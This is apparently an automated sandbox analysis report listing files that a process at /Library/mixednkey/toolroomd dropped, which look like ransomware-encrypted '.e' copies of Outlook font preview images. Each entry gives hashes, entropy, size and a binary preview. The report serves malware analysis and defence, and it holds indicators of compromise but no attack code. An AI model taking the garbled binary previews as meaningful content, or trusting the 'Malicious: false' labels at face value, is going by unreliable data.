MD5:	5EAE3261A4C4A9FD08E97F3881A8904F
SHA1:	1FDF4E4B6590E86359BDBD8A696375AC9895F331
SHA-256:	A0AAD3D35B0D9C7A9B814B65AFA6C8544244433A62BA16C2F6A671B7394BD2F8
SHA-512:	AA0DA67EF296380327D57E27995E4015ABF690E40FD8CB840A8ED64C09C80F2596211445C399BEB9D5B5A6DAEC3634595391949D93630DDE1646176AF98AD1F7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aR...}D.D.p..D.y..;.i...L..@j...^..(>.H....$eV..X......U'..U....;$......[."..d.4....E...........7/L.........RX.^'PS.RX.^'PS.RX.^'PS.=...o.....@.z.6.Y.n\|.....f...Q@.'..5_O...@..c5.,O....Y.G.A` ..JD..d.oX.&7p.s..."....c.}f.Q.l..T............A.F..S.f.!..{@i.e..5.~.=.1[.{d.d4..%..8.. .cs.<.5".)P.-R.s.._.......nK.q.N.M..s5b~2.`N..SpDL...2..m.....M)..J{......p3O...o..5.P.....w(N. ..N.2.>......L".RkWUT[.L..{..E......E.n...mL.....TTF......a.S..]..;.......e....eJJgK..X....+..G"5...L.....j.v....h......-....%:D-......./.;.>0....!.;(`.C.f.Q..T/(.1.....8...<...yB..^~....5.uH."....+.......3.$2.G.......5..i._.....3.g(6.,#j.@4....=.X:...................x.n\|..y...wx.....x...E..\.z....;.s..9e2k.(..$+..qz5..R,`..V.$...6@S..w.X}.....7l.c..1...r=^.)...Ji....K.8.X3.........#Z[t.....x._._n..;3.........\.....h...@L,.;.I.V7.k..Y.L....Yp...=Z........HNX..'z#...8.._Iw....P....b..5!w*O$d.g~..$..IR...R8...b.bI]=.0.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Avenir NextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.455642452790092
Encrypted:	false
SSDEEP:	24:EBsizSHke8T9lSegAzWKdktjv7+2cYvrO5xhOhkIN9B5kmULsePc0m7:EBxYkv9lcAjU7+niahkNb+3LNpq
MD5:	5D07099DC3AE4683B889CD67512F33C1
SHA1:	F255285D592DD83E416E49C2DD0F730EA94B3E4E
SHA-256:	B5D33D6168238BA6EFA61C9B37B9E332CB2034A38E7490928AE2351E17458FD3
SHA-512:	2A001835B0E189220BB918AEAA75DB34EBABF80A26402A07CB2F3DBE9D5FB303F60080A43B7CEB301922C6C488B99C86DB23BF153063E0315F87124465EAF048
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...7F....d...<X...{......^..q..d.l[5.Uq...l>..5..../...C.M.......M.....:au...j...~.?0.e.u........m.U....iG..$.p..o..<..>'AFfd..z-.G..[....Z5.++..YvB.h.......V.r..Y.....R.c%.br........}A.....6#F..,......zj..Z.Q...n..F._.V......jb....+..J3.k...!....M.._4u8..s.K1.T.Um7{..r..H......;..z...WB...G(.).nV.7.X.\t.z..K..G.a...C.+.V.?).aR#Y.....o..b....C.-.....nj.oH.m.....0..~3i].m..8C.........5..H...\|..?.L....R..H\|l.?rO~.Q.-...L...E....I.>.2..(J..#.G.G<.w_Jp..r.c..\|3Z.`.%'..8.J....b!...?`.\|..N?..L.O...5k.5..g.I..[....Ts&.!......+..S2.'4>^[.FI....c:.#.dE....Zr@..\|...>.H........>T.N}..;8.Q.I."..e{.i...P.......K..S.9...."c_`.....rAa.....Y+.^MK...oOD.....Ma.....8.I.\,b....K......7...bA.y>.E..?....0d2....4..FZ..8.\|....Q..G.mA....Zpg...`.w7...q....V+=V....C.D.A."h........Mx...Wt.ys..rl...m+0_....i.s......Nli............+uu..9aR...\|.....n..i.........7Fn.0,.e5>.]g.<.&......J./.Q....*.Y..;...D.3N....).c.cv

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AvenirBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.1610412392135325
Encrypted:	false
SSDEEP:	24:E7Tr+mks6Foaupy0Kvfgoml4x2EBY48sePc0m7:E3r3LqkbKvfNx2EBL8Npq
MD5:	5007241219AAFD80279393EE8771F038
SHA1:	82FA38449AD5588C8E06EA641F3CF6380C9FD3C4
SHA-256:	8F8C0B247853FC6C6B60D6F653C4F1495EF269BFA5FA0F0D4C8143937B1D2EEC
SHA-512:	4B0A67DE9823D7E2600920CAC08929C3E472DD5849B575DAEDD2806EEFB192C74495BEFCB3FE6242689A17A7DC6B0713182A8DDE9ED382E51DFDA9770148F773
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3....z......3V...:...e.K,,..9\|.. ..+.zH..f...............+dp#dg.......<...]......-p\Y..Q..S.=.k\|.~#2R-.-5"s..}m....t..G.......e..Z.kT......k..b`..._...Y...w...3.[..F............h.........t.f9.LQ..e...Y''[D...V.<..mm......R.6.4....0=.NQ..{.E.....v$x.............n...;..\..ym.]8.I.....8K......gg....r....0..W;..\|/.S.y.....^RI.c....a..........aG..-K..N..%o..[..l....r...f...,....Y.N.N..$...a....z."...eb..q...L.....{.\...@..[.....w.w`....z..6^mN..ds.;WY....%..o.#........]...Yv.U..}..0+..\.j.n.95. ^"..%.....0...\|q.N.fA..i..~..t......Q.......q...f.<....a.2...FaDv...Ge.....Hd..e.1_.)\}..I.H.Xk.;......f69.~#2R-.-5.]..&...,.d...yD.\X.Zd..^.6\|-...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AyuthayaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1362
Entropy (8bit):	7.443632209192043
Encrypted:	false
SSDEEP:	24:Eh1TsjzsjvWDZrPO/i443pilizpAQl0zowwUtckLRZYSh+sePc0m7:Ej+z2v0O/5itAtowwUZLwSh+Npq
MD5:	C6221C8D7746F318302387A0B827C592
SHA1:	5F7AF09A6C776EA0AF1243CA601ECA4529BF52C0
SHA-256:	ACA48D6DFC6B33389DDDB28A1E882A9E42D46DC1AB71DB440F9B128ED87D36F1
SHA-512:	351FF77C74E74D46495E18BFC1AEDB0D03D47885F0F14F6C895E18E18CFD7710F4BDA1A96F42E103CC5DD2E0141B0C142B093A816B8BE4F3E2445C0487EE9FFA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.3.........."b.h.E..b.p....2.....uj.x..i...68D....o.u@5.P..........3...1...jK.u.....j0\|%..e.K...8/.../O0..6..S...l..gP.!B..&4.fW:..l.J./_Q...1_.r..oS...s..<....".......o....4.#.+..4.0...+j.T....".M.^.Kv..?..k....r~._G..l.X....CpLyI<.n.v...u....n.....j.4..N~$z.T...$.8'.0(.uo.C/...YU...0.+.X'.GWo.i......j..W .'..u./.8.s.........b.w.#........L.h.C...r...t..q..$...}...Z.&.(...:..vV.H.x....&GC...=.t...i.Ht.u....@".....:YZ#>[.....9....'....]../S.....K.......5......p:.qi..zt.x.,.U....F.......&H=}...%.C.<Q4.>...d.3....2u..._..j1A...C>.O.+..L..7...M...J..0..yI.!.&.Y....y.. ...&.....(Zl....m.:...<...-.2...&........<..hg.O....F\+..Xu$RF....}....;..J.&.[F.s...&.9...6`.G....k.4+.l....S...m#..y".....GK..o...x..]...\|...+'....9)8...39....N.sj#.A@.`..U..#/E1....?...c 4(+...-.F.J,xG.P..x......#3..n....sG(..."..h.H...`...-...?@.ga....w....w..m..a.#'.........`.na..h]..V8..7]W.B..\|1.@.9.]...>.h....+.....H".JV9j

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BaghdadRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	7.47834102753361
Encrypted:	false
SSDEEP:	24:EP2NgPnyM8DB83vjG6f1/5f+6fPgP1zKmUcBsePc0m7:EP2NayM8N+vi4NJPaztHBNpq
MD5:	E75D3978D4FDBB789283444E939BBE4E
SHA1:	A502A7C75C65E10BABE6FA51D8B4F786DF69B54A
SHA-256:	85F993A8ACA7A736641FAD45D32DB7787606C217A4C2E4EE2403B76754D066A3
SHA-512:	589CAEE97BF487D00B514602213EE099E60C7974B81978D3350339C484CFFA7D1BCBBE88247B8E8DD0D29D01830350F3E157321610A4C41629042207370BE52F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.-B+...M.......H?]....._$12>.......>]Ii%.Fv.c?"..Nj.t.fq`....Vz...9_..,lz..g.\np.....sh... ..?......"..s.X.7....#...R'R.4.....JF..$L2.H?.".>.....0..'Do.q/d..Ae..8a&>..-X..(..sc7.\"...:........{.r.....X.a.'}...{;....)+..W.0..../0+...R.(/...&_.DSz.?......>Z...[....R...<.f\..U. .....\7.A.Xq.L..C...4....2.....4F.....y..^...%..n..y.L.^..LN.J.'....D..6...]...<.L.wI...v...0..l....+e.>......Y lZ=..\|\|xO ..>.. .`[..#Sv.^.R.z..IbeX.k..G+.0....S..B).P......p..XH.1l...~...2W/.&q..h/..A3.6.....^G.0.....>. .l..H\...D.FI..Zm@.F..O......j<V../...G..v..T.}..B.;.tH._.N..E.z...$...y...d..a.X.hf...Vwo;1J.K....U.q.7..\|.o.:hN..M.s0......?.w.S...^..i.....+.N.u..bZ....3..>Lt....5..o.............+..b...8...w.9HH....2B\O....!/.. .....%....6.B.E...A\.......=PG..@.9.....e.jL...!9......0Z..q..9...C..Z...^....V...n!.{p..?B.V.^%.f.P..bE.-.{/..A."...sm]..G}......\|.7r......x..f\m..r..ZY....C..m..L1b..P!..ko ,p..9.M

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.488813630966065
Encrypted:	false
SSDEEP:	24:YunHizSmVRQ/bCcPqhiiatkdk1PRpLnPlPpFYygVX79XYs3PsePc0m7:YuOV/QjCsqkiaC2trPtpF2VXZXRNpq
MD5:	F921EBD3F04E4A7FC1951718DA706DD8
SHA1:	3290F0F102CE90C2A13B3EB106A853736E115F09
SHA-256:	56F5AEC73B3421BCA2A11933947F2336AE2F39C5D168F3B188A454333D636501
SHA-512:	76B0612B846FC16BC33A3D90CEC0885744A2542612DD7E0355207D7EFE17E49507F778ADC2BEF4558CE3801758179403C5AD9BF6B9918EC84917E19B59A7BC82
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...[:.b..%.WS.V.!0....v.D.6...i..D&+.&..9.....w8>...y`9..Qc.]w..0.]......!=Y..BD.;..l7U..l{..\|..sR`2.x..._V..o.#...R'R...X...P.D....P.Jy..}fs[.P..I, #.$.<;l.y5jb.h....?.Zs~S.R..I..{.;Q.M.<.d...y.tY}.....K./.$#.......c.L......O.....s....l..=.5..M.....\.b.I..A.1.h.o..M...U.7.........%PJ....X.R......\v.z.[3..b.&.k.we},i..2......E.N....6.F..ZJ...h.T.....V.S....).d.......aI...<.W.\\|!Vv7.S1b.......)gSC.o.A.AV..V.+.......k. .15..H..V&..;t.....W......S...l......`..#4....&..\|..\|;1..:7.....x.@...........?N.1.,.z...\|$...%..r..\...Z{Cp~.!..y..Xc.+..7..lJ....QI..`<.\|o.KkT.l....2.i.{.v...f.../Z....U.a.=.5..).js..U..<q.i$P.Kx.YE..z.....D...m. GC...o.....]..Kr..>"...,@P.;...b'\......W...`....1.gW..i...sl.0..^=...).U...a0~..?~w\4..."z..m..2..Yl..vt..A.X8.&..q.u.!....~.B....L.n.69..<......t.&...M..p[.U..@....>6.M.#K.'.O.E.....Z...+...Y.....c).r...I...CuR....f.g.1..L .....8)B=.p.;....kI...A>...,aw:.Y...x6.oWD.!..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bangla Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	7.631078494242384
Encrypted:	false
SSDEEP:	48:EXknM6euS8iSuFUzres4H3mClqMIJrgM9YEWNpq:ek5eu2FhsKmClqMQ5Eu
MD5:	C9753A7CB733A7DD1B6A401B4178DB53
SHA1:	E85CBDE6EA69FB481DF050748E49E961050AE0A1
SHA-256:	A868B801ADEFFF105F14C3ECA082D17EA664CB6960DCFF9B4EF1A354C4E1C4F4
SHA-512:	B0AC850D395ADEDFF5419DDA86C9F82E7825C505A0E6EB180B9E9331475B77450D95D428B5E8063BE2D1A30D3B53B626E0FF3F26AF41F9358A8D560B926E4309
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...}^...{.....y....}..JX.7........4..W`........(f.bR=.Rf...$.!.q..;.G...i.....z].F..B<6.8O..[..WY=`....=.]..c.......c.......c.....\|...M...p.M5...Y.@.r.L~........G......^.F...:.w.....pP.....I`..%...Z.9$U..^#..\|zN.0].<...J.....O..}.@..lV.h`..6.0.........X...j..PH..e..Bw..K..Z1%.)Q.=...p.T.K..........z..V..v.{.dh...V.c.?....&AC..Tx.;2.........R...V7m...EYj...\|G~.......\..[.~...9.].b..%....U......,Rf...t.y._...._...^.2.ZE-aT.>.....Rr.-L...P..?.7P.=.....<kkh..=........{.Pn..7.~...........p...8.f..F.3O&..9:.lW...@u...4...]z\|b...?.DpO..#".s1.A......j.m...A.)!.2....I.O..x.N...S..{-t4#p.....b.@.....#..m%......X...4..u.C.....$C..#..L...W.in.\T.7......<Z...1.._.A."j...;-.../..F`.7..C..S!].....Y/0..<.....p3...m.s..l_u...sI.....E..P.._5..+....y..%.P.....Gxi...7.....G.."ju.`..d.V......%wY.Y.n.T.;....O...>d..d..$&@...j......S...52./....*...&....0.Iv.c......uj.\|"....s.Y.0.2...,.W\.:e....k.!..c9M.rRN...k.@..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BaskervilleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.406289990378358
Encrypted:	false
SSDEEP:	24:EG2ROC6k1rpIjErrveFaKHK4fh3fqpsGkA59WRf5MGROUN259EsePc0m7:EBOCFveF9h3fDGkAjWROtUN6aNpq
MD5:	B7447C9FE4C939329FC963058F85576C
SHA1:	6081C1DEB1E913679E6A2C1BB919E986C208BAE8
SHA-256:	C96E1F27B423EBC60ACB129E187A5B4CBBE4E43BD3D12017E91FF7B9DD7E2FB8
SHA-512:	1D5925650DEC30F851EBA7E44395026494465420097C7F9C0DA4547A3CD9B1A725608775E0E794ABBD74FA0187F833A9EAF557543C5165A7F4120AD70FEBE8C1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G_...m.(}I....K+....K......+b....q..p.."{3.`.o........M6S....B.5....%(.E.......#........NX......n...'..m.U....iG..$Q...(9...R...-.M"...xt..1I...o..6e...[>.5.\|}r..p\|7......b...].{&._...q.......}...q.a..Yl.....P.U.,.v.O:.9.>..[#..-..&...g.d..`......-....~....i..Q..,.....DK..".?.<d..?_\|.....>.2>g...kx....V...1..P`.[s+....F.AI..=U...$x..!U...S...........:D....2.h..I..]{t.~M...#@........x..P....z.[....5&..K..X+......(5...:.D..\|}.@1,.f....Q.@.U..h.K..S.@t.).g.T_.?..Q.[_Y..6.7..v..GB..Np/............gO...&.)...f.(..U+.. ....1..6..m..0.....\V.G.o@".-..y... ._..l2>......pPG-....]].)O...&.yDu.l..T..,...iv.)_,H....S.U.. ....%.t.e..Q.v.......'.b.._Q.....5.l6....."...^...N.).K..Cn.z.....&...B.-M:.c...wY9....9.I.H.B(6T.q..F.@.....c......m..]v....f\...d!@....4..q.].\."q....6..96D\|r.A#>..j.b........u%.ep..d.....__:..{.._..~G......G.?0}\|.......e4..7....1+6............j..O...T...>......$.M..>.1.A+q.m..}$.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BeirutRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.249297104388558
Encrypted:	false
SSDEEP:	24:EaxgEcap6D/7TI55Pgz+rFUkmUryw4vwNisePc0m7:EIcaEjIXPgz+ZUkmUrIvwNiNpq
MD5:	11354A8705FBB6BC49E02353C64E4E87
SHA1:	C4686D5F60E982A800BB986F71E7A4DA71E4D3E3
SHA-256:	543FAAE48302CAC1AD964F17FC0B6B0751DC4FEBCC24D48DCA8E189C5A21C8BD
SHA-512:	5E169E7AFE80B0CA1C0605122E466BB180065E1660848614DE344A6F8A925BAF954549A970E09D1264A4E38F506DF03E4FA9275077D4C2C234203A7BC08954A0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.zX?.R@.....z..j.d.m.r3H.]..._&...D.."...X..J.PDZD..\PD.M..E...@r$s..B..Jq..S.....p...Y....d...p.?4d...3.w.H%0A.G....Z.....FBl.\|.?}...#E..k.]...A.)...Y/....4.V....Z...yy+.'..5.../..im,.Hi..V9.QG%X..D..ma...W..\|..+.A.D.}g..{<....q....M..u..~'..\|qUu=.\|..}x...l.o....0..].=..{....B.....I...[m..T.i:R.Tl.Z....-eBZ...a...i.....V....'..I%Aj...]l.G[.N...w.p.0..................ML...a.....^.....PE.........(-...nX.w%q3....J].4.'...n....2.=....b..=z..h.'....Z:.`}P.e/.y.z.^....2..k.!...U.iL.&.y..sn.RJ..xi7R..t[..s2.".`I..i.CQ.)l...m...{.....?...9c.A.N.5.>]7'.C..x......"'..... ...p.5#R.ICpm.qlj...n.'?2J.P...1....4."r<..F=.@/.....R.^.Bg?;EQ...L..M7/..b.).-<.h.]..{....I..izBPWy..J...I..tY.w.._o...zt..W....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Big CaslonMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	7.504368758587852
Encrypted:	false
SSDEEP:	24:EmWdk6N4M9Sd1g9QfH7cgSJk3TDOLe9/3TViqGYw2oe3LXmj4nsePc0m7:EmWdkGfe6qboMTDs5qGYw2o9j+Npq
MD5:	A4D710BE1FAD5DDE79F2A530444CFB9F
SHA1:	89486F810ED3DB9550DB0ADE4BC50534951D6DAB
SHA-256:	63AC8F9DE0F17DA5D088FEBB3322EC4721DA282149C9C4DCC8335AD9227F3409
SHA-512:	D6C26E801B5EF3273B1C11FDD1801D1B9E0F3FCF68B9DF3BC70811F035176E3B69EB2DB1FEC34D28BED6E3E71886F8752E81327058DE872AF5821F3DACE3D3C6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....o.........RUd..b.N..:./b.<f$......5.V.....y.......'A.-R.p..i}.....^.^B..E.....S.).E.m.9.f$u9B..=..d...)......6.......'.X.7....5w...........2...Y....f6./K......%=.5;@ .7.i.G...'.N.\)z....."...T.O..3].`.....c...\|.T..x.E. b.C.. Q9.N5..go%<(.....Y.{...L...\.Z..;.`..JaT9.UY..;k.....6.....,...2.n:...a.. z!3...3..N!...i..=.dJ...a.!..FOb..".@....}..>Uh. xVm..`..u.i.p9.c.\|H.>...!....]P&.7...]W.`Q.jy.w..<o.7.(x:.5..P\L!..7.(.w...0....s$#....r.+P.q...nPk.j..^....D.q.D..q,...M....V..SN{.^w.r..GJ1p;...k....zT2;.\f8...yX.k,E.f.l"...n...y........^Tr..;O..c.....K>....f.TN..."\U.....2...\=.Nq..~..d../.M...B.. ......-).. ...F]..........ZM=..Y.J3.W...Ohs.z;b[...0t.S..../o6s..\|[".o.C.d}.e.giO...[.;..L..r!...IH...6.N[X.Aw..#.:.eh........4...LX.l.P..\..}.0...qU.-Y......U....... ..f$...&. .$..X4..`k[.27.....x#'.6.!.<".....=..E.).M..m..@.v.Q.B..#A..T-.]...,.[u.=0...8..-/.h...7.......~..S.u..zNS...9.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 OldstyleBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.6643434278586815
Encrypted:	false
SSDEEP:	24:EXAi1kWpc8pND6CmvDOJPYlIGySDD4Le9TccCMjMHbOcRx+qZoeAwtOyVmY3e1xw:EXAijtpEdDoQIiv94AceghoyY/zfVNpq
MD5:	234EC131C0AEF26F0B9F1D6DA0F7E873
SHA1:	BF5EF861F8711960DE4821777FF742624E512F8D
SHA-256:	6D6F91301C8C588F6856C87575AC96132399A344342E7B58E00D17A3F291B3F8
SHA-512:	58DBACCA560FA68E5EDAB34946D032CC4C5DF38AC52C82C287B2003E8032C57475746F0C9D32D029FE26F54E4160EEC36345BCB8935E041E7FB4A102AAF2E312
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay..h._+<9E..U .b.E.C..-&'...?.....C6..A..{..;a1...D.2.?.t..#...`w....>...=...i.Ff.Y..K.M..pc.:Z..5&...?GH.>..Cp._....Cp._......g....%L;qVL2...?.z..V.].w+qd..G.N[.D..5..F.9...g .F..E.....0.)K8....7.w)EO.v.. .%.s.....V.V`..4.q.zF..C<r.kB,..2.n..c.f...._..6./...8.q.......hV.`H.lP.xw....1...%.qB..L.m.z...he.l.....6.I. .K...i..u"..}2.....H.QL...........`..ua....\|..........J.\|.<......q..Y7}.O3N@..M...a:9.j.b...P2.J.vZ...%x...I.&^4n.Hog...8.5h...?.:...w.zT&..O..bkN.}FO&...~{6.{EE....~>."}.../>.:~.T........#.r...oa..f.n. .e...C...E.0.J.A.0..7#u.Z.7..\|Cu.m4.of..c.,.]m8...=z.-...$~.v.cm.m.z.!.O;WL.....U.xA5..x.zYHf%....@..{`...$K....Y]..y.^/%mR.\..q..$Y..(...`.....L.f6!(mb..'....^1T..........y5.]...qk...&.U..U>.......@x..~.!.tP...l...p....m.6.(.....E.H.r....?. wdX....=.[....O`...o...$.>......Q..\.)..'....A...u.....r...U..F}:M.g/RQx.wD0..7.@.w...q...RVp......h...6....9,^P.....jG.....(..(....~..fy.....\ ...P.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 SmallcapsBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.62133859003375
Encrypted:	false
SSDEEP:	24:EDKVgdR6++KzYPKSrENwWuN+7UZJxRkmJJedaLFLu4YSBJoySfFZJRvGfJ8vUyDT:EWVADhnSrIxuYgxn/1u4Y1yWvvvNGNpq
MD5:	69BABB3E3459C8DCE2B1B6FD33D8F130
SHA1:	F36C3C4601A3914544BA0EFDC03ACDA8D6B94D9C
SHA-256:	2A7D7AC49C933A21A1E600B7351F1AE4813FF5A1E1C82A3BB4B33F370B238745
SHA-512:	6274767C241EB49E3BCE4C87EAEE8EFB36222BCA74D850DAC961F5ED550154E882B0AD049B778594E32E6D2ED98CF63EBDD227DE02EE5CA65850010381A7D2BC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..De..s......;.$eT..Bz9.]..........%?5.....W..eC.G.7.&.W........V,.i../.].....0l..z..W.;C...l....lZu.hLfC..B.hLfC..B..%......P9J..2..o...T...R.7...0..D@..X...l.i.o....Z-....{k.+.F..{U.\v.......7.I\|..SJ.3!.r7\|..M..>.aO=<.=.V..m.....j..:..t..B?..t.b.M..J...>X(.@...3...x-.B.^gmP............sa..$.....<1..p.....0B.H.zC.Fj.B..06-...@.U.~\.>.C.&;..?....?..u.-.(F.cXjO0.[.)tk.\....L..XS.~e'..4..._....8K."c.........K.r.<...r.n....M{... `..OU..S9.iY..o(.,{.)..{.DD.!.<.Dt......f.X..s...-5....<V.m..FP..d..5wx....6...t.i..!..~.......?G........C...:.......\...D.)..mLT-.....T..\\,....H....GM..LI1...4......:.J.K.\|....Qk....a...ja..DR.AV.9U._.e..y...~._V.I.................Q.2..?..........s...F.p.lt...(6....!...Q.B..........;..0...mo.c#.^..-...r.b. ..O.5.J!B..j..=H....{.....M].../.'.6}....s....W._.I.S.a..........#.........3z.p....Z..I.%.....,t(....Ot...N...6..O...F..''....E...r..x..k.}.......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72Book.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.45249672206795
Encrypted:	false
SSDEEP:	24:Emu9DKWPvYAR4Rbwrvc6UtNjRYtheLGop4EaW4EQKz0qHnYsePc0m7:Emu9+ijyRbwrvc6NhuGopkTKwqHnYNpq
MD5:	BDBD7383317B5064EEDED0AE092E381F
SHA1:	69DA1EB2EE790850A0D302AD715DC750666F7F44
SHA-256:	2CBF636CEA7E6B050F8465B9C097274CD4E8D33D99941D872DD4C248FCE2C867
SHA-512:	E93C09C05A69253BF18CDD9EE14009FF99C2EDCEF0D94B0BA856C21A0062EFE7E6221F473222112F79405D8D137A15CB19A092ACF0612C448CD35D22ED98FF18
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...m..HL..P...l....W.,<..v,.!...bF0.."....h._s..;..a.b. .8.Ir...N:.M.a..J..^.+,....ze.....'3a.u.s(....G..a...D........L.<.!.81..2...R..i..t&.c.n.g...?.......we...x^........yo...B....E.M.[IK4.Q.Q#...p.&....ex..9........>E....[....u4.8........^i.J.....\|Y......O.?.O%........O3T{....T...Uz..)x..r%..85..B@;...x3....+.M..r~.r..,t.p.oo..q.=.>...T....w...W`eNC...p.._...Y+.M.&....,{.~o..x?...W..)..w...../.e..3.~..:S.T..x..r.....A4..a.....p...2z.:[ym.7.<:.?.y...B..Np;/.q.E...X..u.5.....<0'.<.........p...2.]T\u...........`.}..d},....f.......l.u5w.v..X.&x.,.m.@.HA4.dBp.1v.^....v.....".b.+W..(.....hs.......5.R:z....q..TE^&.er........C...b9.......&.z.TY./.4......JS...i+(/..^^.......dBB[...a^.)D......6C....g..%k..=..P..+...T.s..g....A+...t../1.C.HD....43Utm....l.......E.a..^3.9<....^q...<6.c...d........ u{.].Zu9...[x..X....b.a...,..L..4.CS ...%..s..C..............\|.U...".#..!...0.R...n.......m..&.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni OrnamentsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1834
Entropy (8bit):	7.618627563701492
Encrypted:	false
SSDEEP:	48:EHTia19CMMrfekg6Zusg7dn7a4MSOFZHzKfzLSlLd2jSVNpq:+1oMR6ZupOVrz8W32jMu
MD5:	BBF38305103EB6D531A0BFC3A96DD63A
SHA1:	15A129E0B88D8116678DB5ACD1E38A4258B8F4C2
SHA-256:	E37EBA7EFA0E18892D66E5FAA9F1971256DD871AEAC136E8C1B2D055E6FF6620
SHA-512:	C3D004AC1B47FD39F80006E59008AF0280E38A2B7EAD4FD197385DE03089880786287AB106A1DDF23ED17E29172743907351B76BC21175CC013205806255E21D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al,..I\|Q.8.U.nc...a.].O..JE.g.u..C"..F..q.,[......[...oM,.....\|T.e..].."....u..v....0e..5....P.>...4\=..a....b..w....o.?....o.?.4.....>.....y..d. .Dz.......:N....S8{.q.^..61M.n.{'m?.!.M........_/c..i.\|..[..t...8....6..OP.....r...`.......$u.:..Yu.y"=..r.!._;-.....r."..w..o...:5...[.2.{....0.D...\....>......6.M..3b....?swH..h.u..Y.G4...~.@....z.'`.l..U...y.i\.A..7.....@C....l.2..,.h....T.Y7li[..K..O.K..>V......Ym...BP.\|.0..../.<...}.]%...5.&.v..D..:.Mf.._..T.}Y..bs....2.f...Kwq..n...8.^..9._..77.....<.o.`..To.C{.....v..Rn^4..{9E...6I...'.....p.H...(MX...l..U....P..^.F.r...t6fV.Iv.Ks....{..d......v...c.6G...V....y..S.s}.........=j2.4..<G.!.B.4...XK>x1........Fc...wU..x..b....d..M..L...1...P..)....`.\........Wc.......:._.1)dV.8...O.}..PA<.. ?....m...8..t6o.K..: ....$AG.-..J&q...y%..#.l...$%...v..,...&...>....'......7..T..va...r.?)VP5.IK`.q0...&...../.,....uh..IE....*...U.'.a.-..6.....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bradley HandBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
